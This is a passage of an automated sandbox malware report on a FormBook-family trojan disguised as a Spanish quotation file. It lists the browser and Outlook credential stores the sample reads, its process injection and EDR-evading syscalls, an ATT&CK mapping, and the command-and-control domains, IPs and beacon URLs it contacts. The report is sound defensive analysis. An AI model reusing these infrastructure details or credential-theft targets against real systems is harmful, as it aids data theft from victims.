            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3764437768.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3756981302.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3764531026.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1505608975.0000000002B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1506786583.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1505236600.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3764618447.0000000002A90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Cotizaci#U00f3n.exeBinary or memory string: WIN_XP
            Source: Cotizaci#U00f3n.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: Cotizaci#U00f3n.exeBinary or memory string: WIN_XPe
            Source: Cotizaci#U00f3n.exeBinary or memory string: WIN_VISTA
            Source: Cotizaci#U00f3n.exeBinary or memory string: WIN_7
            Source: Cotizaci#U00f3n.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3764437768.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3756981302.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3764531026.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1505608975.0000000002B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1506786583.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1505236600.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3764618447.0000000002A90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            2
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            5
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            5
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            3
            Obfuscated Files or Information
            NTDS16
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            5
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets141
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials2
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1515430 Sample: Cotizaci#U00f3n.exe Startdate: 22/09/2024 Architecture: WINDOWS Score: 100 28 www.woshop.online 2->28 30 www.tekilla.wtf 2->30 32 19 other IPs or domains 2->32 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 5 other signatures 2->48 10 Cotizaci#U00f3n.exe 1 2->10         started        signatures3 process4 signatures5 60 Writes to foreign memory regions 10->60 62 Maps a DLL or memory area into another process 10->62 64 Switches to a custom stack to bypass stack traces 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 UOIRaMZSIyDCj.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 UOIRaMZSIyDCj.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.nobartv6.website 103.224.182.242, 49751, 49752, 49753 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 22->34 36 www.kexweb.top 63.250.47.40, 49731, 49732, 49733 NAMECHEAP-NETUS United States 22->36 38 9 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Cotizaci#U00f3n.exe55%ReversingLabsWin32.Trojan.Nymeria
            Cotizaci#U00f3n.exe56%VirustotalBrowse
            Cotizaci#U00f3n.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            www.elsupertodo.net3%VirustotalBrowse
            webredir.vip.gandi.net0%VirustotalBrowse
            www.nobartv6.website2%VirustotalBrowse
            www.kexweb.top2%VirustotalBrowse
            bola88site.one0%VirustotalBrowse
            omexai.info0%VirustotalBrowse
            www.mizuquan.top2%VirustotalBrowse
            natroredirect.natrocdn.com0%VirustotalBrowse
            www.omexai.info0%VirustotalBrowse
            jobworklanka.online2%VirustotalBrowse
            www.dyme.tech0%VirustotalBrowse
            www.tekilla.wtf0%VirustotalBrowse
            www.bola88site.one0%VirustotalBrowse
            www.languagemodel.pro1%VirustotalBrowse
            www.sailnway.net3%VirustotalBrowse
            www.jobworklanka.online2%VirustotalBrowse
            www.woshop.online2%VirustotalBrowse
            www.arlon-commerce.com0%VirustotalBrowse
            www.kxshopmr.store0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.kexweb.top/3bdq/0%Avira URL Cloudsafe
            http://www.languagemodel.pro/nxfn/?0th4S=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVbXaFalsRh/PHN6RHd5lVuz72HidyE/KKxQw=&u2pl=VvmP2xFp0%Avira URL Cloudsafe
            http://www.jobworklanka.online/ikh0/?0th4S=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1qK6qUK96iio+RiU/b4DSTCXDmv8QzV8Y/qA=&u2pl=VvmP2xFp0%Avira URL Cloudsafe
            http://www.dyme.tech/h7lb/0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.languagemodel.pro/nxfn/0%Avira URL Cloudsafe
            http://www.omexai.info/7xi5/?0th4S=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELEy/+PxLvoGKvuptF2gwKAdd6oJOxHosfWX4=&u2pl=VvmP2xFp100%Avira URL Cloudmalware
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            https://www.gandi.net/en/domain0%Avira URL Cloudsafe
            https://www.gandi.net/en/domain0%VirustotalBrowse
            http://www.elsupertodo.net/2jit/?u2pl=VvmP2xFp&0th4S=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1WpEhaSmAJJkEOtzcvEOIT6TmSSM2632jWQ8=100%Avira URL Cloudmalware
            https://whois.gandi.net/en/results?search=languagemodel.pro0%Avira URL Cloudsafe
            http://www.languagemodel.pro/nxfn/2%VirustotalBrowse
            http://www.nobartv6.website/pp43/0%Avira URL Cloudsafe
            http://www.tekilla.wtf/fpzw/100%Avira URL Cloudmalware
            http://www.kexweb.top/3bdq/2%VirustotalBrowse
            http://www.omexai.info/7xi5/100%Avira URL Cloudmalware
            http://www.dyme.tech/h7lb/?0th4S=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0Q9w2g6Txj+QK6DQX/6Khz9Uha7obgVbYrKE=&u2pl=VvmP2xFp0%Avira URL Cloudsafe
            http://www.mizuquan.top/e0nr/0%Avira URL Cloudsafe
            https://whois.gandi.net/en/results?search=languagemodel.pro0%VirustotalBrowse
            http://www.tekilla.wtf/fpzw/?u2pl=VvmP2xFp&0th4S=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyV15vzCfsX7PVMYIeNh7VIWv397Pk5GDHjjKk=100%Avira URL Cloudmalware
            http://www.bola88site.one/3qit/0%Avira URL Cloudsafe
            http://www.omexai.info/7xi5/6%VirustotalBrowse
            http://www.jobworklanka.online/ikh0/0%Avira URL Cloudsafe
            http://www.sailnway.net0%Avira URL Cloudsafe
            http://www.sailnway.net/lrst/0%Avira URL Cloudsafe
            http://www.sailnway.net/lrst/?0th4S=mDrmkSN/AS2kB6l18epq8nmRkgENFEghmXXSSGppVfotDkdoE42/10NRLtLdcVyNlafsoPF4t6hSrFGriq6KZmyEBjaCNdZ4vGhsxtLzd0F9+S16IRTv5qY=&u2pl=VvmP2xFp0%Avira URL Cloudsafe
            http://www.tekilla.wtf/fpzw/6%VirustotalBrowse
            http://www.kexweb.top/3bdq/?0th4S=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exr1k3rbVGomG72bvSmTd+X16WAn8mpVexUKk=&u2pl=VvmP2xFp0%Avira URL Cloudsafe
            https://www.elsupertodo.net/2jit/?u2pl=VvmP2xFp&0th4S=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            www.elsupertodo.net
            148.72.152.174
            truetrueunknown
            webredir.vip.gandi.net
            217.70.184.50
            truetrueunknown
            www.nobartv6.website
            103.224.182.242
            truetrueunknown
            www.kexweb.top
            63.250.47.40
            truetrueunknown
            bola88site.one
            172.96.191.39
            truetrueunknown
            www.dyme.tech
            13.248.169.48
            truetrueunknown
            www.mizuquan.top
            43.242.202.169
            truetrueunknown
            redirect.3dns.box
            172.191.244.62
            truetrue
              unknown
              jobworklanka.online
              91.184.0.200
              truetrueunknown
              omexai.info
              3.33.130.190
              truetrueunknown
              natroredirect.natrocdn.com
              85.159.66.93
              truetrueunknown
              www.tekilla.wtf
              unknown
              unknowntrueunknown
              www.omexai.info
              unknown
              unknowntrueunknown
              www.sailnway.net
              unknown
              unknowntrueunknown
              www.woshop.online
              unknown
              unknowntrueunknown
              www.languagemodel.pro
              unknown
              unknowntrueunknown
              www.bola88site.one
              unknown
              unknowntrueunknown
              www.jobworklanka.online
              unknown
              unknowntrueunknown
              www.arlon-commerce.com
              unknown
              unknowntrueunknown
              www.kxshopmr.store
              unknown
              unknowntrueunknown
              NameMaliciousAntivirus DetectionReputation
              http://www.dyme.tech/h7lb/true
              • Avira URL Cloud: safe
              unknown
              http://www.kexweb.top/3bdq/true
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://www.jobworklanka.online/ikh0/?0th4S=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1qK6qUK96iio+RiU/b4DSTCXDmv8QzV8Y/qA=&u2pl=VvmP2xFptrue
              • Avira URL Cloud: safe
              unknown
              http://www.languagemodel.pro/nxfn/?0th4S=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVbXaFalsRh/PHN6RHd5lVuz72HidyE/KKxQw=&u2pl=VvmP2xFptrue
              • Avira URL Cloud: safe
              unknown
              http://www.languagemodel.pro/nxfn/true
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://www.omexai.info/7xi5/?0th4S=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELEy/+PxLvoGKvuptF2gwKAdd6oJOxHosfWX4=&u2pl=VvmP2xFptrue
              • Avira URL Cloud: malware
              unknown
              http://www.elsupertodo.net/2jit/?u2pl=VvmP2xFp&0th4S=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1WpEhaSmAJJkEOtzcvEOIT6TmSSM2632jWQ8=true
              • Avira URL Cloud: malware
              unknown
              http://www.nobartv6.website/pp43/true
              • Avira URL Cloud: safe
              unknown
              http://www.tekilla.wtf/fpzw/true
              • 6%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://www.omexai.info/7xi5/true
              • 6%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://www.dyme.tech/h7lb/?0th4S=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0Q9w2g6Txj+QK6DQX/6Khz9Uha7obgVbYrKE=&u2pl=VvmP2xFptrue
              • Avira URL Cloud: safe
              unknown
              http://www.mizuquan.top/e0nr/true
              • Avira URL Cloud: safe
              unknown
              http://www.tekilla.wtf/fpzw/?u2pl=VvmP2xFp&0th4S=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyV15vzCfsX7PVMYIeNh7VIWv397Pk5GDHjjKk=true
              • Avira URL Cloud: malware
              unknown
              http://www.bola88site.one/3qit/true
              • Avira URL Cloud: safe
              unknown
              http://www.jobworklanka.online/ikh0/true
              • Avira URL Cloud: safe
              unknown
              http://www.sailnway.net/lrst/true
              • Avira URL Cloud: safe
              unknown
              http://www.sailnway.net/lrst/?0th4S=mDrmkSN/AS2kB6l18epq8nmRkgENFEghmXXSSGppVfotDkdoE42/10NRLtLdcVyNlafsoPF4t6hSrFGriq6KZmyEBjaCNdZ4vGhsxtLzd0F9+S16IRTv5qY=&u2pl=VvmP2xFptrue
              • Avira URL Cloud: safe
              unknown
              http://www.kexweb.top/3bdq/?0th4S=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exr1k3rbVGomG72bvSmTd+X16WAn8mpVexUKk=&u2pl=VvmP2xFptrue
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000004.00000003.1803985462.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://duckduckgo.com/ac/?q=netbtugc.exe, 00000004.00000003.1803985462.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 00000004.00000003.1803985462.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000004.00000003.1803985462.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000004.00000003.1803985462.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.gandi.net/en/domainnetbtugc.exe, 00000004.00000002.3765472175.00000000048C0000.00000004.10000000.00040000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000006.00000002.3764542143.0000000003C40000.00000004.00000001.00040000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.ecosia.org/newtab/netbtugc.exe, 00000004.00000003.1803985462.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://whois.gandi.net/en/results?search=languagemodel.pronetbtugc.exe, 00000004.00000002.3765472175.00000000048C0000.00000004.10000000.00040000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000006.00000002.3764542143.0000000003C40000.00000004.00000001.00040000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000004.00000003.1803985462.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000004.00000003.1803985462.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.sailnway.netUOIRaMZSIyDCj.exe, 00000006.00000002.3766348701.0000000005399000.00000040.80000000.00040000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000004.00000003.1803985462.0000000007F5E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.elsupertodo.net/2jit/?u2pl=VvmP2xFp&0th4S=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6netbtugc.exe, 00000004.00000002.3765472175.0000000004278000.00000004.10000000.00040000.00000000.sdmp, UOIRaMZSIyDCj.exe, 00000006.00000002.3764542143.00000000035F8000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1911667018.000000001EFA8000.00000004.80000000.00040000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              172.191.244.62
              redirect.3dns.boxUnited States
              7018ATT-INTERNET4UStrue
              63.250.47.40
              www.kexweb.topUnited States
              22612NAMECHEAP-NETUStrue
              13.248.169.48
              www.dyme.techUnited States
              16509AMAZON-02UStrue
              91.184.0.200
              jobworklanka.onlineNetherlands
              197902HOSTNETNLtrue
              172.96.191.39
              bola88site.oneCanada
              59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
              103.224.182.242
              www.nobartv6.websiteAustralia
              133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
              217.70.184.50
              webredir.vip.gandi.netFrance
              29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRtrue
              148.72.152.174
              www.elsupertodo.netUnited States
              30083AS-30083-GO-DADDY-COM-LLCUStrue
              3.33.130.190
              omexai.infoUnited States
              8987AMAZONEXPANSIONGBtrue
              85.159.66.93
              natroredirect.natrocdn.comTurkey
              34619CIZGITRtrue
              43.242.202.169
              www.mizuquan.topHong Kong
              40065CNSERVERSUStrue
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1515430
              Start date and time:2024-09-22 17:54:48 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 10m 45s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:12
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:2
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:Cotizaci#U00f3n.exe
              renamed because original name is a hash value
              Original Sample Name:Cotizacin.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@7/2@14/11
              EGA Information:
              • Successful, ratio: 75%
              HCA Information:
              • Successful, ratio: 97%
              • Number of executed functions: 52
              • Number of non-executed functions: 302
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
              • Excluded IPs from analysis (whitelisted): 92.204.80.11
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, whois-unverified.domainbox.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target UOIRaMZSIyDCj.exe, PID 4552 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              TimeTypeDescription
              11:56:43API Interceptor10941822x Sleep call for process: netbtugc.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              172.191.244.62PO# Q919240.exeGet hashmaliciousFormBookBrowse
              • www.tekilla.wtf/fpzw/
              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
              • www.tekilla.wtf/fpzw/
              EGCS-875-S5-SMO M2A.exeGet hashmaliciousFormBookBrowse
              • www.lurknlarkk.xyz/cjjz/
              PO #86637.exeGet hashmaliciousFormBookBrowse
              • www.tekilla.wtf/fpzw/
              AUG 2024 SOA.exeGet hashmaliciousFormBookBrowse
              • www.hermesmilano.xyz/f3mz/
              DN.exeGet hashmaliciousFormBookBrowse
              • www.hermesmilano.xyz/f3mz/
              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
              • www.tekilla.wtf/fpzw/
              GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exeGet hashmaliciousFormBookBrowse
              • www.hermesmilano.xyz/lmxx/
              COTIZACION 280824.exeGet hashmaliciousFormBookBrowse
              • www.tekilla.wtf/fpzw/
              Debit note Jan-Jul 2024.exeGet hashmaliciousFormBookBrowse
              • www.hermesmilano.xyz/f3mz/
              63.250.47.40ES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
              • www.brupack.online/t8b6/
